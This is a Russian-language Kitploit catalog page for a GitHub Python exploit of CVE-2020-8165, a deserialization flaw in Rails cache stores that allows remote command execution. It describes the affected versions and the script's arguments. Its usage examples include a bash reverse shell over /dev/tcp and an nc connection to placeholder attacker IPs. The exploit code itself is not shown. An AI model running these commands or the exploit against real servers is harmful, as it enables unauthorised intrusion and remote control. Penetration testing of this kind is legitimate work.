Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-8165 — Эксплойт на Python для CVE-2020-8165, нацеленный на MemCacheStore и RedisCacheStore в Rails. Обеспечивает удалённое выполнение команд посредством десериализации объектов, предоставленных пользователем, с интерфейсом на основе argparse. | Kitploit
Инструменты/GitHubGitHub/hybryx/cve-2020-8165
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubhybryx/cve-2020-8165

CVE-2020-8165

Эксплойт на Python для CVE-2020-8165, нацеленный на MemCacheStore и RedisCacheStore в Rails. Обеспечивает удалённое выполнение команд посредством десериализации объектов, предоставленных пользователем, с интерфейсом на основе argparse.

Репозиторий
425 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-8165 Эксплойт на Python

Это код для эксплуатации CVE-2020-8165 с использованием Python3. Эксплойт работает с rails < 5.2.4.3 и rails < 6.0.3.1. Эксплойт позволяет атакующему демаршализировать предоставленные пользователем объекты в MemCacheStore и RedisCacheStore. Данный код использует ArgParse, что позволяет пользователю очень просто эксплуатировать эту уязвимость.

Использование

У данного эксплойта пять аргументов:

  • rHost — IP-адрес удалённого (целевого) хоста
  • rPort — номер порта удалённого (целевого) хоста, на котором работает Rails
  • email — email, используемый для входа в сервис
  • password — пароль для входа в учётную запись сервиса
  • cmd — команда для выполнения, в кавычках для учёта пробелов

Примеры:

  • python3 exploit.py 10.10.10.X 8080 [email protected] password "bash -c 'bash -i >& /dev/tcp/10.10.X.X/8989 0>&1'"
  • python3 exploit.py 10.10.10.X 8080 [email protected] password "nc 10.10.X.X 8989"

Основные источники

Оригинальные данные CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165 Код эксплойта с Pastebin, который я доработал и добавил argparse: https://pastebin.com/jpHpdBTk

Скачать инструмент